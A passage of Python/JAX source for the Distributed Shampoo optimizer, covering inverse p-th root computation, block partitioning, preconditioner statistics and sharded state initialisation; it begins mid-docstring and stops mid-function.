`lobpcg_topk_precondition`. Returns: matrix^(-1/p) and the error """ # If the input is not square, materialize it from the concatenated form. if matrix.shape[0] != matrix.shape[1]: matrix = symmetric_matrices.materialize_matrix_from_concat(matrix) assert matrix.shape[0] == matrix.shape[1] # We use _MAT_INV_PTH_ROOT_DTYPE for the matrix inverse pth root. # Switch to f64 if you have hardware that supports it. Enable the jax flag # jax_enable_x64 for this to work. matrix_size = matrix.shape[0] orig_dtype = matrix.dtype matrix = matrix.astype(_MAT_INV_PTH_ROOT_DTYPE) alpha = jnp.asarray(-1.0 / p, _MAT_INV_PTH_ROOT_DTYPE) identity = jnp.eye(matrix_size, dtype=_MAT_INV_PTH_ROOT_DTYPE) original_matrix = matrix if lobpcg_topk_precondition > 0: # TODO(vladf): reuse previous top-k as the initial search directions pad_shape = (matrix_size - lobpcg_topk_precondition, lobpcg_topk_precondition) search_dirs = jnp.concatenate( (jnp.eye(lobpcg_topk_precondition), jnp.zeros(pad_shape)), axis=0 ) eigvals, eigvecs, actual_iters = linalg.lobpcg_standard( matrix, search_dirs, lobpcg_topk_precondition if lobpcg_max_iter == 0 else lobpcg_max_iter, ) del actual_iters # TODO(vladf): return diagnostics dictionary # The minimal eigenvalue among top-k becomes the maximal one in the whole # matrix after deflation. max_ev = jnp.min(eigvals) deflation = eigvals - max_ev scaled_vecs = eigvecs * jnp.sqrt(deflation) # Deflate out top eigenvectors to reduce matrix condition number. matrix -= scaled_vecs.dot(scaled_vecs.T, precision=jax.lax.Precision.HIGHEST) # Only use power iteration if lobpcg wasn't already used to derive the # top eigenvalue. elif relative_matrix_epsilon: _, max_ev = power_iteration( matrix=matrix, num_iters=100, error_tolerance=1e-6, precision=precision ) eigvals, eigvecs = None, None # Unused but required by pytype. # Use absolute matrix epsilon scaling otherwise. else: max_ev = 1.0 eigvals, eigvecs = None, None # Unused but required by pytype. ridge_epsilon = ridge_epsilon * jnp.maximum(max_ev, 1e-6) def _iter_condition(state): (i, unused_mat_m, unused_mat_h, unused_old_mat_h, error, run_step) = state error_above_threshold = jnp.logical_and(error > error_tolerance, run_step) return jnp.logical_and(i < num_iters, error_above_threshold) def _iter_body(state): (i, mat_m, mat_h, unused_old_mat_h, error, unused_run_step) = state mat_m_i = (1 - alpha) * identity + alpha * mat_m new_mat_m = jnp.matmul(mat_power(mat_m_i, p), mat_m, precision=precision) new_mat_h = jnp.matmul(mat_h, mat_m_i, precision=precision) new_error = jnp.max(jnp.abs(new_mat_m - identity)) # sometimes error increases after an iteration before decreasing and # converging. 1.2 factor is used to bound the maximal allowed increase. return (i + 1, new_mat_m, new_mat_h, mat_h, new_error, new_error < error * 1.2) if matrix_size == 1: resultant_mat_h = (matrix + ridge_epsilon) ** alpha error = jnp.array(0, jnp.float32) else: damped_matrix = matrix + ridge_epsilon * identity z = (1 + p) / (2 * jnp.linalg.norm(damped_matrix)) new_mat_m_0 = damped_matrix * z new_error = jnp.max(jnp.abs(new_mat_m_0 - identity)) new_mat_h_0 = identity * jnp.power(z, 1.0 / p) init_state = tuple([0, new_mat_m_0, new_mat_h_0, new_mat_h_0, new_error, True]) _, mat_m, mat_h, old_mat_h, error, convergence = lax.while_loop( _iter_condition, _iter_body, init_state ) error = jnp.max(jnp.abs(mat_m - identity)).astype(jnp.float32) is_converged = jnp.asarray(convergence, old_mat_h.dtype) resultant_mat_h = is_converged * mat_h + (1 - is_converged) * old_mat_h resultant_mat_h = jnp.asarray(resultant_mat_h, orig_dtype) if lobpcg_topk_precondition > 0: # Since we deflated the top eigenvectors prior to p-th root inverse, # the resultant matrix has larger eigenvalues associated with those # same eigenvectors, which we need to now re-deflate. # # Note that _pth_root_difference returns positive values for this # particular argument ordering as min(eigvals) <= eigvals for the # jnp.sqrt below. pth_diff = _pth_root_difference(ridge_epsilon, jnp.min(eigvals), eigvals, p) scaled_vecs = eigvecs * jnp.sqrt(pth_diff) resultant_mat_h = ( resultant_mat_h.astype(scaled_vecs.dtype) - scaled_vecs.dot(scaled_vecs.T, precision=jax.lax.Precision.HIGHEST) ).astype(orig_dtype) mat_m = jnp.matmul( mat_power(resultant_mat_h, p), original_matrix, precision=jax.lax.Precision.HIGHEST, ) error = jnp.max(jnp.abs(mat_m - identity)).astype(jnp.float32) return resultant_mat_h, error def merge_small_dims(shape_to_merge, max_dim): """Merge small dimensions. If there are some small dimensions, we collapse them: e.g. [1, 2, 512, 1, 2048, 1, 3, 4] --> [1024, 2048, 12] if max_dim = 1024 [1, 2, 768, 1, 2048] --> [2, 768, 2048] Args: shape_to_merge: Shape to merge small dimensions. max_dim: Maximal dimension of output shape used in merging. Returns: Merged shape. """ if shape_to_merge and np.all(np.array(shape_to_merge) == 1): return [1] resulting_shape = [] product = 1 for d in shape_to_merge: if product * d <= max_dim: product *= d else: if product > 1: resulting_shape.append(product) product = d if product > 1: resulting_shape.append(product) return resulting_shape def pad_square_matrix(mat, max_size): """Pad a square matrix up to max_size. Args: mat: a matrix to pad. max_size: matrix size requested. Returns: Given M returns [[M, 0], [0, I]] """ rows, cols = mat.shape if rows != cols: raise ValueError( f"Must have rows == cols, instead got rows={rows}, cols={cols}" ) if cols > max_size: raise ValueError( f"Must have cols <= max_size. Instead got cols={cols}, max_size={max_size}." ) if rows == max_size: return mat pad_size = max_size - rows zs1 = jnp.zeros([rows, pad_size], dtype=mat.dtype) zs2 = jnp.zeros([pad_size, rows], dtype=mat.dtype) eye = jnp.eye(pad_size, dtype=mat.dtype) mat = jnp.concatenate([mat, zs1], 1) mat = jnp.concatenate([mat, jnp.concatenate([zs2, eye], 1)], 0) return mat def make_sliced_padding( symmetric_block_size, num_blocks, starting_block, dtype, ): """Returns padding for symmetric block matrix. Specifically, the padding is given concatenated rectangular matrices representing the lower-triangular rows below the starting block. For example, if we want to pad the symmetric matrix M = [[A, B^T] [B, C]], the desired output (in terms of the full matrix) with num_blocks = 4 is M_padded = [[A, B^T, 0, 0] [B, C, 0, 0] [0, 0, I, 0] 0, 0, 0, I]. We would represent M as the block matrix mat = [A, B, C]. In this form, the additional padding to provide has form [0, 0, I, 0, 0, 0, I] (only the lower triangular parts in the third and fourth rows). Args: symmetric_block_size: The size of each block. num_blocks: The total number of blocks. starting_block: The block where to start the padding. dtype: The type to use for the blocks. """ if starting_block == num_blocks: return jnp.zeros(shape=(symmetric_block_size, 0), dtype=dtype) blocks = [] for i in range(starting_block, num_blocks): blocks.append( jnp.zeros( shape=(symmetric_block_size, symmetric_block_size * i), dtype=dtype ) ) blocks.append(jnp.eye(symmetric_block_size, dtype=dtype)) return jnp.concatenate(blocks, axis=-1) def pad_block_symmetric_matrix( mat, symmetric_block_size, max_num_blocks, ): """Returns the padded blocked symmetric matrix. The size of the padded matrix will be: [symmetric_block_size, symmetric_block_size * max_num_blocks] The input matrix can either: - Be square with size less or equal to symmetric_block_size. In this case, mat will first be padded to a square matrix of size symmetric_block_size, and then be padded again up to the full size of the blocked matrix. - Be a rectangle with number of rows equal to block size. In this case, number of columns must be a multiple of number of rows, and the ratio must correspond to a block representation of a symmetric matrix. That is, the ratio must have form x * (x + 1) / 2. Here, x represents the number of block rows represented by the matrix. Args: mat: The input block matrix. symmetric_block_size: The size of blocks. max_num_blocks: The largest number of blocks to pad to. """ rows, cols = mat.shape if rows > symmetric_block_size: raise ValueError( "Must have rows <= symmetric_block_size. Instead got " f"rows={rows}, symmetric_block_size={symmetric_block_size}." ) if rows > cols: raise ValueError( f"Must have rows <= cols, instead got rows={rows}, cols={cols}." ) if cols > symmetric_block_size * max_num_blocks: raise ValueError( "Must have cols <= symmetric_block_size * max_num_blocks " f"Instead got cols={cols}, " f"symmetric_block_size={symmetric_block_size}, " f"max_num_blocks={max_num_blocks}." ) if rows < symmetric_block_size: mat = pad_square_matrix(mat, max_size=symmetric_block_size) # Update rows and cols after possibly padding in pad_square_matrix. rows, cols = mat.shape assert rows == symmetric_block_size assert cols % rows == 0 filled_blocks = cols // rows padding_blocks = make_sliced_padding( symmetric_block_size=symmetric_block_size, num_blocks=symmetric_matrices.num_blocks_from_total_blocks(max_num_blocks), starting_block=symmetric_matrices.num_blocks_from_total_blocks(filled_blocks), dtype=mat.dtype, ) return jnp.concatenate([mat, padding_blocks], axis=-1) def pad_vector(vec, max_size): """Pad a vector to a max_size. Args: vec: a vector to pad. max_size: matrix size requested. Returns: Given V returns [V, 0] """ size = vec.shape[0] assert size <= max_size if size == max_size: return vec pad_size = max_size - size zs1 = jnp.zeros([pad_size], dtype=vec.dtype) return jnp.concatenate([vec, zs1], 0) def efficient_cond(predicate, compute_fn, init_state, *args, **kwargs): """Avoids wasteful buffer allocation with XLA.""" def _iter_body(unused_state): results = compute_fn(*args, **kwargs) return tuple([False] + list(results)) def _iter_condition(state): return state[0] results = jax.lax.while_loop( _iter_condition, _iter_body, tuple([predicate] + init_state) ) return tuple(results[1:]) class BlockPartitioner: """Partitions a tensor into smaller tensors.""" def __init__(self, param, block_size): self._shape = param.shape self._splits = [] split_sizes = [] # We split params into smaller blocks. Here we store the metadata to make # that split. for i, d in enumerate(param.shape): if 0 < block_size < d: # d-1, otherwise split appends a 0-size array. nsplit = (d - 1) // block_size indices = (np.arange(nsplit, dtype=np.int32) + 1) * block_size sizes = np.ones(nsplit + 1, dtype=np.int32) * block_size sizes[-1] = d - indices[-1] self._splits.append((i, indices)) split_sizes.append(sizes) else: split_sizes.append(np.array([d], dtype=np.int32)) self._split_sizes = split_sizes def split_sizes(self): return self._split_sizes def partition(self, tensor): """Partition tensor into blocks.""" assert tensor.shape == self._shape tensors = [tensor] for i, indices in self._splits: tensors_local = [] for t in tensors: tensors_local.extend(jnp.split(t, indices_or_sections=indices, axis=i)) tensors = tensors_local return tensors def merge_partitions(self, partitions): """Merge partitions back to original shape.""" for i, indices in reversed(self._splits): n = len(indices) + 1 partial_merged_tensors = [] ind = 0 while ind < len(partitions): partial_merged_tensors.append( jnp.concatenate(partitions[ind : ind + n], axis=i) ) ind += n partitions = partial_merged_tensors assert len(partitions) == 1 return partitions[0] def gram_weighted_update(old_stats, g, axis, w1, w2, precision=None): """Updated statistics via weighted average with new Gram matrix. Returns w₁ R + w₂ Gᵀ G where R is `old_stats` and G is the matrix whose columns are the flattened slices of the tensor `g` along the given `axis`. (So, `old_stats` and the returned matrix have dimensions n x n where n = `g.shape[axis]`). Args: old_stats: Old statistics. g: Gradient tensor. axis: Axis along which to slice `g`. w1: Scalar weight for old statistics. w2: Scalar weight for new Gram matrix. precision: Optional precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) Returns: Weighted average of old and new statistics. """ axes = [i for i in range(g.ndim) if i != axis] gram_matrix = jnp.tensordot(g, g, axes=(axes, axes), precision=precision) return w1 * old_stats + w2 * gram_matrix class Preconditioner: """Compute statistics/shape from gradients for preconditioning.""" def __init__( self, param, block_size, merge_small_dims_block_size, best_effort_shape_interpretation, preconditioner_type=PreconditionerType.ALL, ): """Initializes the preconditioner. Args: param: parameter to precondition. block_size: Block size used to split param. merge_small_dims_block_size: Block size for merging dims. best_effort_shape_interpretation: Whether to collapse/merge dims together. preconditioner_type: Type of preconditioner to use. """ self._original_shape = param.shape self._transformed_shape = param.shape if best_effort_shape_interpretation: self._transformed_shape = merge_small_dims( self._original_shape, merge_small_dims_block_size ) reshaped_param = jnp.reshape(param, self._transformed_shape) self._partitioner = BlockPartitioner(reshaped_param, block_size) self._preconditioner_type = preconditioner_type def updated_statistics_from_grad( self, stats, grad, w1, w2, to_float=None, from_float=None, precision=None, ): """Update statistics from gradients. Args: stats: Old statistics or its Cholesky factor if `cholesky` is True. grad: Gradient to compute statistics from. w1: Weight for old statistics. w2: Weight for new statistics. to_float: Optional function for converting stats to floating point. from_float: Optional function for converting from floating point. precision: Optional precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) Returns: A list of updated gradient statistics for each partition. """ to_float = to_float if to_float is not None else (lambda x: x) from_float = from_float if from_float is not None else (lambda x: x) update = functools.partial(gram_weighted_update, precision=precision) reshaped_grad = jnp.reshape(grad, self._transformed_shape) partitioned_grads = self._partitioner.partition(reshaped_grad) new_stats = [] index = 0 for g in partitioned_grads: should_preconditioned_dims = self.should_precondition_dims() num_preconditioners = sum(should_preconditioned_dims) for axis in range(num_preconditioners): new_stat = update(to_float(stats[index]), g, axis, w1, w2) new_stats.append(from_float(new_stat)) index += 1 return new_stats def should_precondition_dims(self): """A vector containing indicator indicating if the dim is preconditioned.""" split_sizes = self._partitioner.split_sizes() rank = len(split_sizes) if self._preconditioner_type == PreconditionerType.ALL or rank <= 1: return [True] * rank else: return [True] * (rank - 1) + [False] def shapes_for_preconditioners(self): """Returns shape from statistics.""" split_sizes = self._partitioner.split_sizes() rank = len(split_sizes) # We ignore preconditioner types if rank == 1 preconditioner_shapes = [] for t in itertools.product(*split_sizes): if self._preconditioner_type == PreconditionerType.ALL or rank <= 1: preconditioner_shapes.extend([[d, d] for d in t]) else: preconditioner_shapes.extend([[d, d] for d in t[:-1]]) return preconditioner_shapes def exponent_for_preconditioner(self): """Returns exponent to use for inverse-pth root M^{-1/p}.""" should_preconditioned_dims = self.should_precondition_dims() num_preconditioners = sum(should_preconditioned_dims) return 2 * num_preconditioners def preconditioned_grad(self, grad, preconditioners): """Precondition the gradient. Args: grad: A gradient tensor to precondition. preconditioners: A list of preconditioners to apply. Returns: A preconditioned gradient. """ reshaped_grad = jnp.reshape(grad, self._transformed_shape) partitioned_grads = self._partitioner.partition(reshaped_grad) preconditioned_partitioned_grads = [] for i, g in enumerate(partitioned_grads): should_preconditioned_dims = self.should_precondition_dims() num_preconditioners = sum(should_preconditioned_dims) preconditioners_for_grad = preconditioners[ i * num_preconditioners : (i + 1) * num_preconditioners ] precond_g = g rank = len(g.shape) for j, precondition in enumerate(should_preconditioned_dims): if precondition: precond_g = jnp.tensordot( precond_g, preconditioners_for_grad[j], axes=[[0], [0]] ) else: precond_g = jnp.transpose(precond_g, axes=(*range(1, rank), 0)) preconditioned_partitioned_grads.append(precond_g) merged_grad = self._partitioner.merge_partitions( preconditioned_partitioned_grads ) return jnp.reshape(merged_grad, self._original_shape) def _convert_to_parameter_stats(global_stats, local_stat, convert_statistics=True): """Creates parameter stats from sharded stats.""" index_start = int(local_stat.index_start) index_end = int(len(local_stat.sizes)) + index_start statistics = global_stats.statistics[index_start:index_end, :, :] preconditioners = global_stats.preconditioners[index_start:index_end, :, :] new_statistics = [] new_preconditioners = [] for i, size in enumerate(local_stat.sizes): new_statistics.append(statistics[i][:size, :size]) new_preconditioners.append(preconditioners[i][:size, :size]) if not convert_statistics: new_statistics = None return ParameterStats( local_stat.diagonal_statistics, new_statistics, new_preconditioners, local_stat.diagonal_momentum, local_stat.momentum, local_stat.training_metrics, ) def _convert_from_parameter_stats(parameter_stats, local_stats): """Creates sharded stats from paramter stats.""" return LocalShardedParameterStats( parameter_stats.diagonal_statistics, parameter_stats.diagonal_momentum, parameter_stats.momentum, parameter_stats.training_metrics, local_stats.index_start, local_stats.sizes, ) def _add_error_into_local_stats(local_stats, errors, inverse_failure_threshold): """Adds errors back into local statistics.""" new_local_stats = [] for local_stat in local_stats: if local_stat.sizes: index_start = int(local_stat.index_start) index_end = int(len(local_stat.sizes)) + index_start per_stat_error = errors[index_start:index_end] else: per_stat_error = jnp.array(0, jnp.float32) if local_stat.sizes: per_stat_error = jnp.where( jnp.logical_and( per_stat_error > 0.0, per_stat_error != inverse_failure_threshold ), per_stat_error, local_stat.training_metrics.inverse_pth_root_errors, ) new_local_stats.append( LocalShardedParameterStats( local_stat.diagonal_statistics, local_stat.diagonal_momentum, local_stat.momentum, TrainingMetrics(per_stat_error), local_stat.index_start, local_stat.sizes, ) ) return new_local_stats def batch(x, num_devices): """Batch `x` so that so that leading axis is num_devices.""" n = len(x) b = int(n / num_devices) return jnp.stack([jnp.stack(x[idx : idx + b]) for idx in range(0, n, b)]) def unbatch(batched_values): """Unbatch values across leading axis and return a list of elements.""" b1, b2 = batched_values.shape[0], batched_values.shape[1] results = [] for v_array in jnp.split(batched_values, indices_or_sections=b1, axis=0): v_array = jnp.squeeze(v_array) # b2 = batches (number of preconditioner computation) per core. if b2 > 1: for v in jnp.split(v_array, indices_or_sections=b2, axis=0): results.append(jnp.squeeze(v)) else: results.append(v_array) return results def distributed_shampoo( learning_rate, block_size, beta1=0.9, beta2=0.999, diagonal_epsilon=1e-10, matrix_epsilon=1e-6, weight_decay=0.0, start_preconditioning_step=5, preconditioning_compute_steps=1, statistics_compute_steps=1, best_effort_shape_interpretation=True, graft_type=GraftingType.SGD, nesterov=True, exponent_override=0, # Pass pmap 'batch axis name' in pmap mode. batch_axis_name=None, ### Only set following 3 params in pjit/spmd mode. ### WARNING: Experimental statistics_partition_spec=None, preconditioner_partition_spec=None, num_devices_for_pjit=None, shard_optimizer_states=False, ### ### Experimental memory reduction mode best_effort_memory_usage_reduction=False, ### inverse_failure_threshold=0.1, moving_average_for_momentum=False, skip_preconditioning_dim_size_gt=4096, clip_by_scaled_gradient_norm=None, precision=lax.Precision.HIGHEST, tensordot_precision=None, relative_matrix_epsilon=True, merge_small_dims_block_size=4096, lobpcg_topk_precondition=0, lobpcg_max_iter=0, precondtioner_type=PreconditionerType.ALL, skip_preconditioning_rank_lt=1, decoupled_learning_rate=True, decoupled_weight_decay=False, ): """Distributed Shampoo optimizer. Distributed Shampoo is a second-order preconditioned method (concretely, a variant of full-matrix Adagrad), that provides significant convergence and wall-clock time improvements compared to conventional first-order methods, and that has been shown to scale to large state-of-the-art deep learning models. References: Scalable Second Order Optimization for Deep Learning, Rohan Anil, Vineet Gupta, Tomer Koren, Kevin Regan, Yoram Singer Preprint: https://arxiv.org/abs/2002.09018 Args: learning_rate: the step size used to update the parameters. block_size: Block size for large layers (if > 0). Preconditioning compute operation is cubic in the dimension of the tensor. Block size allows us to chunk the layers into sub-layers of maximal dimension dictated by this value. Use 128 as default (increase if you have compute budget). beta1: momentum parameter. beta2: second moment averaging parameter. diagonal_epsilon: epsilon for diagonal adagrad (only if layerwise grafting to AdaGrad is enabled). matrix_epsilon: epsilon to add to statistics before computing inverse pth root. If you are running in f32 precision for inverse pth root (recommended today) this can go upto 1e-6. If you have latest hardware with native f64 precision, set this upto 1e-12. weight_decay: Weight decay for regularization. start_preconditioning_step: When to start Shampoo update before which diagonal update is used. This is because we dont have enough information to do stable inverse. preconditioning_compute_steps: How often to compute preconditioner. Performance tuning params for controlling memory and compute requirements. Ideally set this and statistics_compute_steps params to 1. statistics_compute_steps: How often to compute statistics. best_effort_shape_interpretation: If there are some small dimensions, collapse them e.g. [1, 2, 512, 1, 2048, 1, 3, 4] --> [1024, 2048, 12] if block = 1024, [1, 2, 768, 1, 2048] --> [2, 768, 2048] graft_type: Grafting is a technique to fix the layerwise scale of Shampoo optimizer. This allows us to plugin the Shampoo optimizer into settings where SGD/AdaGrad is already well tuned. nesterov: Nesterov momentum. exponent_override: Override the exponent used in matrix inverse. batch_axis_name: labeled axis over pmap for data-parallel training the optimizer used for. statistics_partition_spec: PartitionSpec to be used in sharded mode. preconditioner_partition_spec: PartitionSpec to be used in sharded mode. num_devices_for_pjit: Number of devices to parallelize over when using pjit. shard_optimizer_states: Shard optimizer states to save memory in model parallel training. best_effort_memory_usage_reduction: Best effort memory usage reduction. - diagonal_statistics -> jnp.bfloat16 - momentum buffers (2x) -> jnp.int8 - statistics, preconditioners -> jnp.int16 + diagonals inverse_failure_threshold: numerics are hard and inverses fail sometimes; we determine that using this threshold. moving_average_for_momentum: Whether to use moving average for momentum instead of exponential moving average. skip_preconditioning_dim_size_gt: Skip if preconditioning dim size is greater than this value. clip_by_scaled_gradient_norm: Clip by scaled gradient norm (only useful when using RMSProp Grafting). precision: precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) tensordot_precision: Optional precision to use for the tensordot operation when computing statistics (e.g., G Gᵀ). Same options as `precision` above. relative_matrix_epsilon: Whether to use relative epsilon to the max eigen value when computing inverse-pth root. merge_small_dims_block_size: Used as the maximum block size to merge the shapes. lobpcg_topk_precondition: If nonzero, specifies the number of top eigenvectors to subtract out before performing LOBPCG. Note this makes relative_matrix_epsilon essentially free. lobpcg_max_iter: Number of LOBPCG iterations, if zero defaults to `lobpcg_topk_precondition`. precondtioner_type: Preconditioner type to select all, left only or right only preconditioners. skip_preconditioning_rank_lt: Skips preconditioning for parameters with rank less than this value. decoupled_learning_rate: If True, use decoupled learning rate, otherwise couple it with preconditioned gradient computation. (Default True) decoupled_weight_decay: If True, use decoupled weight decay, otherwise couple with weight decay. (Default False) Returns: a GradientTransformation. """ def _graft_type_has_diagonal_statistics(): """Returns True if using diagonal firt order method for grafting.""" return graft_type != GraftingType.SGD and graft_type != GraftingType.SQRT_N def quantized_dtype_for_momentum_buffers(var): return ( jnp.int8 if best_effort_memory_usage_reduction and len(var.shape) > 1 else jnp.float32 ) # Preconditioner and statistics are both stores as int16 in this mode. # We take out the diagonal to make quantization easier. def quantized_dtype_for_second_moment_statistics_buffers(): return ( jnp.int16 if best_effort_memory_usage_reduction and batch_axis_name else jnp.float32 ) # Preconditioner and statistics are both stores as int16 in this mode. # We take out the diagonal to make quantization easier. def quantized_dtype_for_second_moment_preconditioner_buffers(): return ( jnp.int16 if best_effort_memory_usage_reduction and batch_axis_name else jnp.float32 ) def _to_float(maybe_quantized): if isinstance(maybe_quantized, QuantizedValue): return maybe_quantized.to_float() else: return maybe_quantized def _maybe_quantize_statistics(statistics_list): return _maybe_quantize_matrices_with_dtype( statistics_list, quantized_dtype_for_second_moment_statistics_buffers() ) def _maybe_quantize_preconditioners(statistics_list): return _maybe_quantize_matrices_with_dtype( statistics_list, quantized_dtype_for_second_moment_preconditioner_buffers() ) def _maybe_quantize_matrices_with_dtype(statistics_list, quantized_dtype): if quantized_dtype != jnp.float32: return [ QuantizedValue.from_float_value( s, quantized_dtype, extract_diagonal=True ) for s in statistics_list ] else: return statistics_list def _maybe_dequantize_preconditioners(preconditioner_list): return _maybe_dequantize_matrices_with_dtype( preconditioner_list, quantized_dtype_for_second_moment_preconditioner_buffers(), ) def _maybe_dequantize_matrices_with_dtype(statistics_list, quantized_dtype): if quantized_dtype != jnp.float32: return [s.to_float() for s in statistics_list] else: return statistics_list def _quantize_diagonal_statistics(diagonal_statistics): return QuantizedValue.from_float_value(diagonal_statistics, jnp.float32) def _quantize_momentum(momentum_statistics): return QuantizedValue.from_float_value( momentum_statistics, quantized_dtype_for_momentum_buffers(momentum_statistics), ) def preconditioner_from_params(param): """Returns a Preconditioner object for given param.""" return Preconditioner( param, block_size, merge_small_dims_block_size, best_effort_shape_interpretation, precondtioner_type, ) def sharded_init_fn(params): """Returns optimizer state (for PJIT mode). Args: params: the parameters that should be updated. """ params_flat, treedef = jax.tree_flatten(params) # Find max size to pad to. max_size = 0 for param in params_flat: preconditioner = preconditioner_from_params(param) if not _skip_preconditioning(param): shapes = preconditioner.shapes_for_preconditioners() sizes = [s[0] for s in shapes] max_size = max(max(sizes), max_size) padded_statistics = [] padded_preconditioners = [] local_stats_flat = [] exponents = [] for param in params_flat: preconditioner = preconditioner_from_params(param) shapes = preconditioner.shapes_for_preconditioners() sizes = [] statistics = [] preconditioners = [] index_start = len(padded_statistics) if not _skip_preconditioning(param): sizes = [s[0] for s in shapes] shapes = preconditioner.shapes_for_preconditioners() statistics = [ matrix_epsilon * jnp.eye(max_size, dtype=jnp.float32) for s in shapes ] preconditioners = [jnp.eye(max_size, dtype=jnp.float32) for s in shapes] padded_statistics.extend(statistics) padded_preconditioners.extend(preconditioners) exponent = ( preconditioner.exponent_for_preconditioner() if exponent_override == 0 else exponent_override ) exponents.extend([exponent] * len(shapes)) diagonal_statistics = _quantize_diagonal_statistics(jnp.zeros_like(param)) diagonal_momentum = _quantize_momentum(jnp.zeros_like(param)) momentum = _quantize_momentum(jnp.zeros_like(param)) local_stats_flat.append( LocalShardedParameterStats( diagonal_statistics, diagonal_momentum, momentum, init_training_metrics(len(sizes)), index_start, sizes, ) ) local_stats = jax.tree_unflatten(treedef, local_stats_flat) to_pad = -len(padded_statistics) % num_devices_for_pjit if max_size == 0: to_pad = num_devices_for_pjit max_size = block_size stat_dtype = jnp.float32 else: stat_dtype = padded_statistics[0].dtype # Pad the statistics and preconditioner matrices to be a multiple of # num devices. # TODO(rohananil): Relax to only the size of the mesh axis where the dim # is split on. padded_statistics.extend( [jnp.eye(max_size, dtype=stat_dtype) for _ in range(to_pad)] ) padded_preconditioners.extend( [jnp.eye(max_size, dtype=stat_dtype) for _ in range(to_pad)] ) exponents.extend([1 for _ in range(to_pad)]) global_stats = GlobalShardedParameterStats( jnp.stack(padded_statistics), jnp.stack(padded_preconditioners), jnp.stack(exponents), ) return ShampooState( count=jnp.zeros([], jnp.int32), stats=ShardedShampooStats(global_stats, local_stats), ) def _max_statistics_size_from_params(params): max_size = 0 for param in params: param_clone = jnp.zeros(param.shape, dtype=param.dtype) preconditioner = preconditioner_from_params(param_clone) if not _skip_preconditioning(param): shapes = preconditioner.shapes_for_preconditioners() sizes = [s[0] for s in shapes] max_size = max(max(sizes), max_size) return max_size def _remove_leading_sharding_annotation(pspec): """Mapping from N-d to (N-1)-d, used for quantization, factoring etc.""" # None and PSpec(None) are valid PSpecs. if pspec and len(pspec) > 1: return pjit.PartitionSpec(*pspec[1:]) else: return [] def sharded_init_partition_spec_fn( params, params_partition_spec, partition_spec_for_statistics ): """Returns a parallel state tree with PartitionSpec associated with state. Args: params: A pytree with params. params_partition_spec: A pytree with PartitionSpec for params. partition_spec_for_statistics: PartitionSpec for the statistics. """ # Parallel lists of spec, and params. param_pspec_flat, _ = jax.tree_flatten( params_partition_spec, is_leaf=lambda x: x is None ) params_flat, treedef = jax.tree_flatten(params) assert param_pspec_flat assert params_flat # Step is replicated across cores. # None means cores. local_stats_flat = [] num_statistics = 0 for param, param_pspec in zip(params_flat, param_pspec_flat): param_clone = jnp.zeros(param.shape, dtype=param.dtype) preconditioner = preconditioner_from_params(param_clone) shapes = preconditioner.shapes_for_preconditioners() sizes = [] index_start = num_statistics if not _skip_preconditioning(param): sizes = [s[0] for s in shapes] shapes = preconditioner.shapes_for_preconditioners() num_statistics += len(shapes) qdtype = quantized_dtype_for_momentum_buffers(param) m1_pspec = param_pspec m2_pspec = param_pspec m1_scale_pspec = [] m2_scale_pspec = [] if qdtype != jnp.float32: m1_scale_pspec = _remove_leading_sharding_annotation(m1_pspec) m2_scale_pspec = _remove_leading_sharding_annotation(m2_pspec) local_stats_flat.append( LocalShardedParameterStats( QuantizedValue( param_pspec, [], [], jnp.float32, False, list(param.shape) ), QuantizedValue( m1_pspec, [], m1_scale_pspec, qdtype, False, list(param.shape) ), QuantizedValue( m2_pspec, [], m2_scale_pspec, qdtype, False, list(param.shape) ), init_training_metrics_pspec(), index_start, sizes, ) ) local_stats = jax.tree_unflatten(treedef, local_stats_flat) global_stats = GlobalShardedParameterStats( partition_spec_for_statistics, partition_spec_for_statistics, pjit.PartitionSpec(), ) count_pspec = pjit.PartitionSpec() return ShampooState( count=count_pspec, stats=ShardedShampooStats(global_stats, local_stats) ) def sharded_init_shape_and_dtype_fn(params): """Returns a parallel state tree with shape, dtype associated with state. Args: params: A pytree with params. """ # Parallel lists of spec, and params. params_flat, treedef = jax.tree_flatten(params) assert params_flat # Step is replicated across cores. # None means cores. local_stats_flat = [] num_statistics = 0 for param in params_flat: param_clone = jnp.zeros(param.shape, dtype=param.dtype) preconditioner = preconditioner_from_params(param_clone) shapes = preconditioner.shapes_for_preconditioners() sizes = [] index_start = num_statistics if not _skip_preconditioning(param): sizes = [s[0] for s in shapes] shapes = preconditioner.shapes_for_preconditioners() num_statistics += len(shapes) qdtype = quantized_dtype_for_momentum_buffers(param) m1_shape_and_dtype = [list(param.shape), param.dtype] m2_shape_and_dtype = [list(param.shape), param.dtype] m1_scale_shape_and_dtype = [] m2_scale_shape_and_dtype = [] if qdtype != jnp.float32: m1_scale_shape_and_dtype = [list(param.shape)[1:], qdtype] m2_scale_shape_and_dtype = [list(param.shape)[1:], qdtype] diagonal_statistics_shape_and_dtype = [list(param.shape), param.dtype] local_stats_flat.append( LocalShardedParameterStats( QuantizedValue( diagonal_statistics_shape_and_dtype, [], [], jnp.float32, False, list(param.shape), ), QuantizedValue( m1_shape_and_dtype, [], m1_scale_shape_and_dtype, qdtype, False, list(param.shape), ), QuantizedValue( m2_shape_and_dtype, [], m2_scale_shape_and_dtype, qdtype, False, list(param.shape), ), init_training_metrics_shapes(len(sizes)), index_start, sizes, ) ) local_stats = jax.tree_unflatten(treedef, local_stats_flat) max_statistics_size = _max_statistics_size_from_params(params_flat) to_pad = -num_statistics % num_devices_for_pjit num_statistics += to_pad if num_statistics == 0: num_statistics = num_devices_for_pjit max_statistics_size = block_size statistics_shape = [num_statistics, max_statistics_size, max_statistics_size] global_stats = GlobalShardedParameterStats( [statistics_shape, jnp.float32], [statistics_shape, jnp.float32], [[num_statistics], jnp.int32], ) return ShampooState( count=[[], jnp.float32], stats=ShardedShampooStats(global_stats, local_stats), ) def sharded_update_fn(grads, state, params): """Transform the input gradient and update all statistics in sharded mode. Args: grads: the gradient tensors for the parameters. state: a named tuple containing the state of the optimizer params: the parameters that should be updated. Returns: A tuple containing the new parameters and the new optimizer state. """ params_flat, treedef = jax.tree_flatten(params) grads_flat = treedef.flatten_up_to(grads) global_stats = state.stats.global_stats local_stats_flat = 